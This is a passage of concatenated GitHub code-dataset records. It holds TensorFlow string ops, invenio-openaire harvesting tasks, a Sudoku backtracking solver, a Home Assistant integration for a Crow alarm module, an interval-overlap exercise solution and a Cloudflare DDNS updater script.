`N` and `data` with rank `N+M`:\n\n ```\n output[i, k1...kM] = strings.join([data[j1...jN, k1...kM])\n ```\n\n where the join is over all `[j1...jN]` such that `segment_ids[j1...jN] = i`.\n\n Strings are joined in row-major order.\n\n For example:\n\n >>> inputs = ['this', 'a', 'test', 'is']\n >>> segment_ids = [0, 1, 1, 0]\n >>> num_segments = 2\n >>> separator = ' '\n >>> tf.strings.unsorted_segment_join(inputs, segment_ids, num_segments,\n ... separator).numpy()\n array([b'this is', b'a test'], dtype=object)\n\n >>> inputs = [['Y', 'q', 'c'], ['Y', '6', '6'], ['p', 'G', 'a']]\n >>> segment_ids = [1, 0, 1]\n >>> num_segments = 2\n >>> tf.strings.unsorted_segment_join(inputs, segment_ids, num_segments,\n ... separator=':').numpy()\n array([[b'Y', b'6', b'6'],\n [b'Y:p', b'q:G', b'c:a']], dtype=object)\n\n Args:\n inputs: A list of `tf.Tensor` objects of type `tf.string`.\n segment_ids: A tensor whose shape is a prefix of `inputs.shape` and whose\n type must be `tf.int32` or `tf.int64`. Negative segment ids are not\n supported.\n num_segments: A scalar of type `tf.int32` or `tf.int64`. Must be\n non-negative and larger than any segment id.\n separator: The separator to use when joining. 
Defaults to `\"\"`.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor representing the concatenated values, using the given\n separator.\n \"\"\"\n return gen_string_ops.unsorted_segment_join(\n inputs, segment_ids, num_segments, separator=separator, name=name)\n\n\n# Register elementwise ops that don't have Python wrappers.\ndispatch.register_unary_elementwise_api(gen_string_ops.as_string)\ndispatch.register_unary_elementwise_api(gen_string_ops.decode_base64)\ndispatch.register_unary_elementwise_api(gen_string_ops.encode_base64)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_lower)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_upper)\ndispatch.register_unary_elementwise_api(gen_string_ops.unicode_transcode)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_strip)\ndispatch.register_unary_elementwise_api(\n gen_string_ops.string_to_hash_bucket_fast)\ndispatch.register_unary_elementwise_api(\n gen_string_ops.string_to_hash_bucket_strong)\ndispatch.register_unary_elementwise_api(gen_string_ops.unicode_script)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/ops/string_ops.py","file_name":"string_ops.py","file_ext":"py","file_size_in_byte":23982,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"71081560999","text":"from __future__ import absolute_import, print_function\n\nfrom copy import deepcopy\n\nfrom celery import chain, shared_task\nfrom flask import current_app\nfrom invenio_db import db\nfrom invenio_indexer.api import RecordIndexer\nfrom invenio_pidstore.errors import PIDDoesNotExistError\nfrom invenio_pidstore.resolver import Resolver\nfrom invenio_records.api import Record\n\nfrom .loaders import LocalFundRefLoader, LocalOAIRELoader, \\\n RemoteFundRefLoader, RemoteOAIRELoader\nfrom .minters import funder_minter, grant_minter\n\n\n@shared_task(ignore_result=True)\ndef harvest_fundref(source=None):\n \"\"\"Harvest funders from FundRef and store as authority records.\"\"\"\n loader = LocalFundRefLoader(source=source) if source \\\n else RemoteFundRefLoader()\n for funder_json in loader.iter_funders():\n register_funder.delay(funder_json)\n\n\n@shared_task(ignore_result=True)\ndef harvest_openaire_projects(source=None, setspec=None):\n \"\"\"Harvest grants from OpenAIRE and store as authority records.\"\"\"\n loader = LocalOAIRELoader(source=source) if source \\\n else RemoteOAIRELoader(setspec=setspec)\n for grant_json in loader.iter_grants():\n register_grant.delay(grant_json)\n\n\n@shared_task(ignore_result=True)\ndef harvest_all_openaire_projects():\n \"\"\"Reharvest all grants from OpenAIRE.\n\n Harvest all OpenAIRE grants in a chain to prevent OpenAIRE\n overloading from multiple parallel harvesting.\n \"\"\"\n setspecs = current_app.config['OPENAIRE_GRANTS_SPECS']\n chain(harvest_openaire_projects.s(setspec=setspec)\n for setspec in setspecs).apply_async()\n\n\n@shared_task(ignore_result=True)\ndef register_funder(data):\n \"\"\"Register the funder JSON in records and create a PID.\"\"\"\n create_or_update_record(data, 'frdoi', 'doi', funder_minter)\n\n\n@shared_task(ignore_result=True, rate_limit='20/s')\ndef register_grant(data):\n \"\"\"Register the grant JSON in records and create a PID.\"\"\"\n create_or_update_record(data, 'grant', 'internal_id', grant_minter)\n\n\ndef create_or_update_record(data, pid_type, id_key, minter):\n \"\"\"Register a funder or grant.\"\"\"\n resolver = Resolver(\n pid_type=pid_type, 
object_type='rec', getter=Record.get_record)\n\n try:\n pid, record = resolver.resolve(data[id_key])\n data_c = deepcopy(data)\n del data_c['remote_modified']\n record_c = deepcopy(record)\n del record_c['remote_modified']\n # All grants on OpenAIRE are modified periodically even if nothing\n # has changed. We need to check for actual differences in the metadata\n if data_c != record_c:\n record.update(data)\n record.commit()\n record_id = record.id\n db.session.commit()\n RecordIndexer().index_by_id(str(record_id))\n except PIDDoesNotExistError:\n record = Record.create(data)\n record_id = record.id\n minter(record.id, data)\n db.session.commit()\n RecordIndexer().index_by_id(str(record_id))\n","repo_name":"inveniosoftware/invenio-openaire","sub_path":"invenio_openaire/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"16094334906","text":"from math import *\r\n#from random import *\r\nimport time\r\n\r\nnmbrs = [int(1), int(2), int(3), int(4), int(5), int(6), int(7), int(8), int(9)]\r\n\r\n# Reading the document + transforming into lists\r\nwith open('sudoku.txt', 'r') as f:\r\n lines = f.read()\r\n newlines = lines.rstrip()\r\n\r\ny = []\r\nfor i in range(0, 9):\r\n x = []\r\n for j in range(0, 9):\r\n x.append(int(newlines[j + (10 * i)]))\r\n y.append(x)\r\n\r\n# Printing sudoku input\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\nprint('The input is:')\r\nprint(\r\n)\r\nprint(*y, sep='\\n')\r\nprint(\r\n)\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\n# Sector generation (0 downto 8 from left to right, up to down):\r\nsectors = []\r\nh = []\r\nv = []\r\nfor k in range(0, 9):\r\n v = []\r\n h = []\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n if k <= 2:\r\n h.append(y[i][j + (3 * k)])\r\n if (k == 3) or (k == 4) or (k == 5):\r\n h.append(y[i + 3][j + (3 * (k - 3))])\r\n if (k == 6) or (k == 7) or (k == 8):\r\n h.append(y[i + 6][j + (3 * (k - 6))])\r\n sectors.append(h)\r\n\r\n# Column generation (col list, 0 downto 8 from left to right):\r\ncol = []\r\nfor i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(y[j][i])\r\n col.append(n)\r\n\r\n\r\ndef colgen(z): ##Column update using str:\r\n col = []\r\n for i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(z[j * 9 + i])\r\n col.append(n)\r\n return col\r\n\r\n\r\ndef rowgen(z): # Row update using str:\r\n y = []\r\n for i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(z[j + 9 * i])\r\n y.append(n)\r\n return y\r\n\r\n\r\n# Sudoku string-shaped (0 downto 80, left to right, up to down):\r\nstr = []\r\nfor i in range(0, 9):\r\n for j in range(0, 9):\r\n str.append(y[i][j])\r\n\r\n# Validity indicator, to remember original sudoku numbers (0 = to change, 1 = fixed):\r\nval = []\r\nfor i in range(0, 81):\r\n if str[i] == 0:\r\n val.append(int(0))\r\n else:\r\n val.append(int(1))\r\n\r\n# sector in string form (0 downto 80, ranging from 0 to 8):\r\nsl = [0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 3, 3, 3, 4, 4, 4, 5, 5, 5,\r\n 3, 3, 3, 4, 4, 4, 5, 5, 5,\r\n 3, 3, 3, 4, 4, 4, 5, 5, 5,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8]\r\n\r\n\r\n# correcting variable w (horizontal coordinate, from 0 to 8):\r\ndef wunder(w):\r\n underflow = 
True\r\n while underflow:\r\n w = w + 9\r\n if w >= 0:\r\n underflow = False\r\n return w\r\n\r\n\r\ndef wover(w):\r\n overflow = True\r\n while overflow:\r\n w = w - 9\r\n if w <= 8:\r\n overflow = False\r\n return w\r\n\r\n\r\n#######################################LOGIC#############################################\r\n# Current solving method used in the code, called \"backtracking\".\r\nunsolved = True # Defining constants outside the while loop\r\nu = 0\r\nw = 0\r\noutput = [[], [], [], [], [], [], [], [], []]\r\nstart = time.process_time()\r\nwhile unsolved: # Start of the solving loop\r\n if w <= -1:\r\n w = wunder(w)\r\n if u >= 81:\r\n break\r\n if val[u] == 0: # Check if number can be edited\r\n h = floor(u / 9)\r\n si = w + 3 * h - 3 * sl[u]\r\n str[u] += 1\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[w].count(str[u]) <= 1) and (\r\n y[h].count(str[u]) <= 1): # Check if old number + 1 is valid\r\n if str[u] >= 10: # If the number is 10, reset number to 0 and backtrack\r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n backtrack = True\r\n while backtrack: # Backtracking loop, until it finds a number it can change\r\n u -= 1\r\n w -= 1\r\n if val[u] == 0:\r\n backtrack = False\r\n else:\r\n continue\r\n else: # If the number is within the 3 laws and is not bigger than 10, move on to the next cell\r\n u += 1\r\n w += 1\r\n if w >= 9: # Correcting for a w bigger than 8\r\n w = wover(w)\r\n if w <= -1: # Correcting for a w smaller than 0\r\n w = wunder(w)\r\n else: # If old number + 1 doesn't abide by laws, go back to beginning of loop to add + 1\r\n u += 0\r\n w += 0\r\n else: # If cell value is not to be edited (val from list = 1) then skip and go to next cell\r\n if val[u] == 1:\r\n u += 1\r\n w += 1\r\n if w >= 9: # Correcting for a w bigger than 8\r\n w = wover(w)\r\n if w <= -1: # Correcting for a w smaller than 0\r\n w = wunder(w)\r\n if u == 81: # If it reaches the end of the sudoku str string, end the while loop\r\n unsolved = False\r\n\r\nend = time.process_time() # Recording time of end\r\nfor i in range(0, 9): # Generation of the output list to be displayed\r\n for j in range(0, 9):\r\n output[i].append(str[j + 9 * i])\r\ntimetaken = float('%.4g' % (end - start))\r\n#######################################################################################################################\r\n\r\n# Presenting output list + time taken\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\nprint('The final answer is:')\r\nprint(\r\n)\r\nprint(*output, sep='\\n')\r\nprint(\r\n)\r\nprint(f\"with a runtime of {timetaken} seconds.\")\r\nprint(\r\n)\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\ninput(\"Press Enter to continue...\")\r\n\r\n'''\r\n#######################################################################################################################\r\n#Guessing Logic, slow at best, inaccurate at worst.\r\nunsolved = True\r\noutput = [[],[],[],[],[],[],[],[],[]]\r\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\nsi = 0\r\ni = 0\r\nc = 0\r\nerrors = [0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\nwhile unsolved:\r\n 
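# phase 1: randomly fill every editable cell, then hand off to the correction pass\r\n    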
randomize = True\r\n while randomize:\r\n \r\n if i >= 81:\r\n randomize = False\r\n correcting = True\r\n i = 0\r\n break\r\n a = int(choice(numbers))\r\n if val[i] == 0:\r\n str[i] = a\r\n sectors[sl[i]][si] = str[i]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[i]].count(str[i]) <= 1) and (col[si].count(str[i]) <= 1) and (y[c].count(str[i]) <= 1):\r\n \r\n print(\"number assigned\")\r\n i += 1 \r\n else:\r\n str[i] = 0\r\n print(\"error\")\r\n i += 1\r\n \r\n print(\"repeat\")\r\n \r\n continue\r\n else:\r\n i += 1\r\n print(\"skipped\")\r\n #error.append(int(0))\r\n continue\r\n if i >= 81:\r\n randomize = False\r\n correcting = True\r\n i = 0\r\n break\r\n c = floor(i/9)\r\n q = i - 9*c\r\n si = q + 3*c - 3*sl[i]\r\n print(str) \r\n while correcting:\r\n if i >= 81:\r\n randomize = True\r\n correcting = False\r\n i = 0\r\n break\r\n elif val[i] == 1:\r\n i += 1\r\n elif val[i] == 0:\r\n if str[i] != 0 and((sectors[sl[i]].count(str[i]) <= 0) and (col[si].count(str[i]) <= 0) and (y[c].count(str[i])) <= 0):\r\n errors[i] = int(0)\r\n i += 1\r\n else:\r\n print(\"correcting\")\r\n str[i] = 0\r\n sectors[sl[i]][si] = str[i]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n errors[i] = int(1)\r\n i += 1\r\n \r\n c = floor(k/9)\r\n q = k - 9*c\r\n si = q + 3*c - 3*sl[k]\r\n if sum(errors) <= 0:\r\n unsolved = False\r\n print(str)\r\n \r\n\r\n\r\nfor i in range(0,9):\r\n for j in range(0,9):\r\n output[i].append(str[j + 9*i])\r\n#######################################################################################################################\r\n'''\r\n'''\r\n#######################################################################################################################\r\n#constants and related: KINDA WORKS, BUT GETS STUCK TOO EARLY\r\nunsolved = True\r\noutput = [[],[],[],[],[],[],[],[],[]]\r\nu = 0 #index of str, from 0 to 80 inclusive.\r\nq = 0 #horizontal position, from 0 to 8 inclusive\r\nc = 0 #vertical position, from 0 to 8 inclusive\r\nsi = 0 # position within a sector, from 0 to 8 inclusive\r\nwhile unsolved:\r\n if val[u] == 0: #updating and adding +1 to a changeable number\r\n str[u] += 1\r\n print(\"added +1\")\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n if str[u] >= 10: \r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n u -= 1\r\n print(\"going back one\")\r\n else:\r\n u += 1\r\n print(\"going forward one\")\r\n \r\n if val[u] == 1:\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n u += 1\r\n print(\"ignoring cell and going forward one\")\r\n \r\n else:\r\n backtrack = True\r\n while backtrack:\r\n print(\"going back\")\r\n u -= 1\r\n c = floor(u/9)\r\n q = u - (9*c)\r\n si = q + 3*c - 3*sl[u]\r\n if val[u] == 0 and ((sectors[sl[u]].count(str[u]) >= 2) or (col[si].count(str[u]) >= 2) or (y[c].count(str[u]) >= 2)):\r\n backtrack = False\r\n print(\"correcting\")\r\n str[u] += 1\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n if str[u] >= 10: \r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n u -= 1\r\n print(\"going back one\")\r\n else:\r\n u += 1\r\n print(\"going forward one\")\r\n \r\n \r\n \r\n \r\n c = floor(u/9)\r\n q = u - (9*c)\r\n 
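# sector-relative index of cell u within its 3x3 block\r\n    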
si = q + 3*c - 3*sl[u]\r\n if u >= 81:\r\n unsolved = False\r\n \r\n \r\nfor i in range(0,9):\r\n for j in range(0,9):\r\n output[i].append(str[j + 9*i])\r\n#######################################################################################################################\r\n'''\r\n","repo_name":"ccastrogarc/Sudoku-Solver","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":11646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20802504720","text":"\"\"\"Crow/AAP IP Module init file\"\"\"\nimport asyncio\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.core import callback\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import EVENT_HOMEASSISTANT_STOP, CONF_TIMEOUT, CONF_HOST\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.discovery import async_load_platform\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\n\n_LOGGER = logging.getLogger(__name__)\n\nDOMAIN = \"crowipmodule\"\n\nDATA_CRW = \"crowipmodule\"\n\nCONF_CODE = \"code\"\nCONF_CROW_KEEPALIVE = \"keepalive_interval\"\nCONF_CROW_PORT = \"port\"\nCONF_AREANAME = \"name\"\nCONF_AREAS = \"areas\"\nCONF_ZONENAME = \"name\"\nCONF_ZONES = \"zones\"\nCONF_ZONETYPE = \"type\"\nCONF_OUTPUTS = \"outputs\"\nCONF_OUTPUTNAME = \"name\"\n\nDEFAULT_PORT = 5002\nDEFAULT_KEEPALIVE = 60\nDEFAULT_ZONETYPE = \"opening\"\nDEFAULT_TIMEOUT = 10\n\nSIGNAL_ZONE_UPDATE = \"crowipmodule.zones_updated\"\nSIGNAL_AREA_UPDATE = \"crowipmodule.areas_updated\"\nSIGNAL_SYSTEM_UPDATE = \"crowipmodule.system_updated\"\nSIGNAL_OUTPUT_UPDATE = \"crowipmodule.output_updated\"\nSIGNAL_KEYPAD_UPDATE = \"crowipmodule.keypad_updated\"\n\nOUTPUT_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_OUTPUTNAME): cv.string,\n }\n)\nZONE_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_ZONENAME): cv.string,\n vol.Optional(CONF_ZONETYPE, default=DEFAULT_ZONETYPE): cv.string,\n }\n)\n\nAREA_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_AREANAME): cv.string,\n vol.Optional(CONF_CODE, default=''): cv.string,\n }\n)\n\n\nCONFIG_SCHEMA = vol.Schema(\n {\n DOMAIN: vol.Schema(\n {\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_ZONES): {vol.Coerce(int): ZONE_SCHEMA},\n vol.Optional(CONF_AREAS): {vol.Coerce(int): AREA_SCHEMA},\n vol.Optional(CONF_OUTPUTS): {vol.Coerce(int): OUTPUT_SCHEMA},\n vol.Optional(CONF_CROW_PORT, default=DEFAULT_PORT): cv.port,\n vol.Optional(CONF_CROW_KEEPALIVE, default=DEFAULT_KEEPALIVE): vol.All(\n vol.Coerce(int), vol.Range(min=15)\n ),\n vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int),\n }\n )\n },\n extra=vol.ALLOW_EXTRA,\n)\n\nasync def async_setup(hass, config):\n \"\"\"Set up for Crow IP Module.\"\"\"\n from pycrowipmodule import CrowIPAlarmPanel\n\n conf = config.get(DOMAIN)\n host = conf.get(CONF_HOST)\n code = '0000'\n port = conf.get(CONF_CROW_PORT)\n keep_alive = conf.get(CONF_CROW_KEEPALIVE)\n zones = conf.get(CONF_ZONES)\n areas = conf.get(CONF_AREAS)\n outputs = conf.get(CONF_OUTPUTS)\n connection_timeout = conf.get(CONF_TIMEOUT)\n sync_connect = asyncio.Future()\n\n controller = CrowIPAlarmPanel(\n host,\n port,\n code,\n keep_alive,\n hass.loop,\n connection_timeout,\n )\n\n hass.data[DATA_CRW] = controller\n\n @callback\n def connection_fail_callback(data):\n \"\"\"Network failure callback.\"\"\"\n _LOGGER.error(\"Could not establish a connection with the Crow Ip Module\")\n if not sync_connect.done():\n 
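# register cleanup, then mark the connection attempt as failed\n            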
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_crowipmodule)\n            sync_connect.set_result(False)\n\n    @callback\n    def connected_callback(data):\n        \"\"\"Handle a successful connection.\"\"\"\n        _LOGGER.info(\"Established a connection with the Crow Ip Module\")\n        if not sync_connect.done():\n            hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_crowipmodule)\n            sync_connect.set_result(True)\n\n    @callback\n    def zones_updated_callback(data):\n        \"\"\"Handle zone updates.\"\"\"\n        _LOGGER.debug(\"Crow Ip Module sent a zone update event. Updating zones...\")\n        async_dispatcher_send(hass, SIGNAL_ZONE_UPDATE, data)\n\n    @callback\n    def areas_updated_callback(data):\n        \"\"\"Handle area changes thrown by crow (including alarms).\"\"\"\n        _LOGGER.debug(\"The Crow Ip Module sent an area update event. Updating areas...\")\n        async_dispatcher_send(hass, SIGNAL_AREA_UPDATE, data)\n\n    @callback\n    def system_updated_callback(data):\n        \"\"\"Handle system updates.\"\"\"\n        _LOGGER.debug('Crow Ip Module sent a system update event. Updating system...')\n        async_dispatcher_send(hass, SIGNAL_SYSTEM_UPDATE, data)\n\n    @callback\n    def output_updated_callback(data):\n        \"\"\"Handle output updates.\"\"\"\n        _LOGGER.debug(\"Crow Ip Module sent an output update event. Updating output...\")\n        async_dispatcher_send(hass, SIGNAL_OUTPUT_UPDATE, data)\n\n    @callback\n    def stop_crowipmodule(event):\n        \"\"\"Shutdown Crow IP Module connection and thread on exit.\"\"\"\n        _LOGGER.info(\"Shutting down CrowIpModule\")\n        controller.stop()\n\n\n    controller.callback_zone_state_change = zones_updated_callback\n    controller.callback_area_state_change = areas_updated_callback\n    controller.callback_system_state_change = system_updated_callback\n    controller.callback_output_state_change = output_updated_callback\n\n    controller.callback_connected = connected_callback\n    controller.callback_login_timeout = connection_fail_callback\n\n    _LOGGER.info(\"Start CrowIpModule.\")\n    controller.start()\n\n    result = await sync_connect\n    if not result:\n        return False\n\n    # Load sub-components for Crow Ip Module\n    if areas:\n        hass.async_create_task(\n            async_load_platform(\n                hass,\n                \"alarm_control_panel\",\n                \"crowipmodule\",\n                {CONF_AREAS: areas},\n                config,\n            )\n        )\n        hass.async_create_task(\n            async_load_platform(\n                hass,\n                \"sensor\",\n                \"crowipmodule\",\n                {CONF_AREAS: areas},\n                config,\n            )\n        )\n\n    if zones:\n        hass.async_create_task(\n            async_load_platform(\n                hass,\n                \"binary_sensor\",\n                \"crowipmodule\",\n                {CONF_ZONES: zones},\n                config,\n            )\n        )\n\n    hass.async_create_task(\n        async_load_platform(\n            hass,\n            \"switch\",\n            \"crowipmodule\",\n            {CONF_OUTPUTS: outputs},\n            config,\n        )\n    )\n\n    return True\n\n\nclass CrowIPModuleDevice(Entity):\n    \"\"\"Representation of a Crow IP Module.\"\"\"\n\n    def __init__(self, name, info, controller):\n        \"\"\"Initialize the device.\"\"\"\n        self._controller = controller\n        self._info = info\n        self._name = name\n\n    @property\n    def name(self):\n        \"\"\"Return the name of the device.\"\"\"\n        return self._name\n\n    @property\n    def should_poll(self):\n        \"\"\"No polling needed.\"\"\"\n        return False\n\n","repo_name":"febalci/ha_pycrowipmodule","sub_path":"custom_components/crowipmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"33531417941","text":"#User function Template for python3\n\nclass Solution:\n\n    def findMaxGuests(self, entry, exit, n):\n        entry.sort()\n        exit.sort()\n        ptr1 = ptr2 = 0\n        
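# sweep the sorted times with two pointers; an arrival raises the\n        # current guest count, a departure lowers it\n        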
count1 = 0\n        maxcount = 0\n        ans = 0\n        while ptr1 < n and ptr2 < n:\n            if entry[ptr1] <= exit[ptr2]:\n                count1 += 1\n                if count1 > maxcount:\n                    maxcount = count1\n                    ans = entry[ptr1]\n                ptr1 += 1\n            else:\n                count1 -= 1\n                ptr2 += 1\n        return [maxcount, ans]\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n\n    t = int(input())\n\n    for _ in range(t):\n\n        N = int(input())\n\n        entry = [int(x) for x in input().split()]\n        exit = [int(x) for x in input().split()]\n\n        solObj = Solution()\n        ans = solObj.findMaxGuests(entry, exit, N)\n        print(ans[0],ans[1])\n\n\n# } Driver Code Ends","repo_name":"sandesh32/LeetCode","sub_path":"Maximum Intervals Overlap - GFG/maximum-intervals-overlap.py","file_name":"maximum-intervals-overlap.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7532715809","text":"from include import cloudflare\nimport logging\nfrom time import sleep\nimport os\n\nlogging.basicConfig(level=logging.INFO)\n\ndef get_or_revert_to_none(env_var, as_int=False):\n    var = os.getenv(env_var, default=None)\n    if var is None or var == \"\":\n        return None\n    else:\n        if as_int:\n            var = int(var)\n        return var\n\nclass ENV_VARS:\n    DOMAIN = os.getenv(\"DOMAIN\", default=None)\n    PROXIED_RECORDS_RAW = os.getenv(\"PROXIED_RECORDS\", default=None)\n    UNPROXIED_RECORDS_RAW = os.getenv(\"UNPROXIED_RECORDS\", default=None)\n    DDNS_UPDATE_FREQ = get_or_revert_to_none(\"DDNS_UPDATE_FREQ\", as_int=True)\n    DELETE_ACME_RECORDS = os.getenv(\"DELETE_ACME_RECORDS\", default=\"false\").lower() == \"true\"\n    DELETE_ACME_RECORDS_WAIT = get_or_revert_to_none(\"DELETE_ACME_RECORDS_WAIT\", as_int=True)\n\nmissing_env_vars = [k for k, v in vars(ENV_VARS).items() if not k.startswith(\"_\") and v is None]\nif missing_env_vars:\n    raise Exception(f\"Missing env vars: {missing_env_vars}\")\n\nPROXIED_RECORDS = [f\"{rec}.{ENV_VARS.DOMAIN}\" for rec in ENV_VARS.PROXIED_RECORDS_RAW.split(\",\") if rec not in (ENV_VARS.DOMAIN, '')]\nUNPROXIED_RECORDS = [f\"{rec}.{ENV_VARS.DOMAIN}\" for rec in ENV_VARS.UNPROXIED_RECORDS_RAW.split(\",\") if rec not in (ENV_VARS.DOMAIN, '')] if ENV_VARS.UNPROXIED_RECORDS_RAW is not None else []\nfor rec in UNPROXIED_RECORDS:\n    if rec in PROXIED_RECORDS:\n        PROXIED_RECORDS.remove(rec)\n\nRECORD_NAMES_BY_PROXY_TYPE = {\n    True: PROXIED_RECORDS,\n    False: UNPROXIED_RECORDS\n    }\n\nlogging.info(\"Proxied Items To Monitor:\\n\\t\" + \"\\n\\t\".join(RECORD_NAMES_BY_PROXY_TYPE[True]))\nlogging.info(\"Unproxied Items To Monitor:\\n\\t\" + \"\\n\\t\".join(RECORD_NAMES_BY_PROXY_TYPE[False]))\n\ndef set_dns():\n    current_ip = cloudflare.get_current_ip()\n    existing_records_names = [rec.name for rec in cloudflare.get_records()]\n\n    # Discover new\n    records_added = 0\n    for proxy_enabled, record_names in RECORD_NAMES_BY_PROXY_TYPE.items():\n        for record in record_names:\n            if record not in existing_records_names:\n                logging.info(f\"Creating DNS Record for {record}\")\n                cloudflare.create_record(cloudflare.DNSRecord(dns_name=record,\n                                                              dns_ip=current_ip,\n                                                              dns_proxied=proxy_enabled))\n                logging.info(f\"\\t{record} has been created.\")\n                records_added += 1\n    if records_added > 0:\n        logging.info(f\"Added {records_added} new DNS record{'s' if records_added > 1 else ''}\")\n    else:\n        logging.info(\"No DNS records needed to be added\")\n\ndef delete_acme_records():\n    logging.info(\"Starting acme record cleanup\")\n    challenge_prefix = \"_acme-challenge.\"\n    try:\n        txt_records = 
cloudflare.get_records(type=\"TXT\")\n        if len(txt_records) > 0:\n            logging.info(f\"\\t{len(txt_records)} acme challenge{'s' if len(txt_records) > 1 else ''} exist\")\n        else:\n            logging.info(\"\\tNo acme challenges needed to be deleted\")\n\n        for record in txt_records:\n            if any(f\"{challenge_prefix}{x}\" in record.name for x in PROXIED_RECORDS+UNPROXIED_RECORDS):\n                cloudflare.delete_record(record)\n            else:\n                logging.info(f\"\\tSkipping {record.name}\")\n\n    except Exception as e:\n        logging.error(f\"Encountered exception:\\n{e}\")\n\n\ndef ddns_loop():\n    while True:\n        try:\n            #TODO: check if proxy type accurate\n            logging.info(\"Checking For DDNS Updates\")\n            current_ip = cloudflare.get_current_ip()\n            existing_records_by_name = {rec.name: rec for rec in cloudflare.get_records()}\n            for proxy_type, rec_names in RECORD_NAMES_BY_PROXY_TYPE.items():\n                for rec_name in rec_names:\n                    if rec_name in existing_records_by_name:\n                        dns_record = existing_records_by_name[rec_name]\n                        update_should_occur = False\n                        if dns_record.ip != current_ip:\n                            logging.info(f\"\\t{rec_name}'s IP must be updated from {dns_record.ip} to {current_ip}\")\n                            update_should_occur = True\n                        if dns_record.proxied != proxy_type:\n                            logging.info(f\"\\t{rec_name}'s proxy status must be updated from {dns_record.proxied} to {proxy_type}\")\n                            update_should_occur = True\n                        if update_should_occur:\n                            dns_record.ip = current_ip\n                            dns_record.proxied = proxy_type\n                            cloudflare.update_record(dns_record)\n                            logging.info(f\"\\t\\t{rec_name} has been updated.\")\n                        else:\n                            logging.info(f\"\\t{rec_name} does not need to be updated.\")\n        except Exception as e:\n            logging.error(f\"Encountered exception:\\n{e}\\n\\n Will attempt again next loop.\")\n        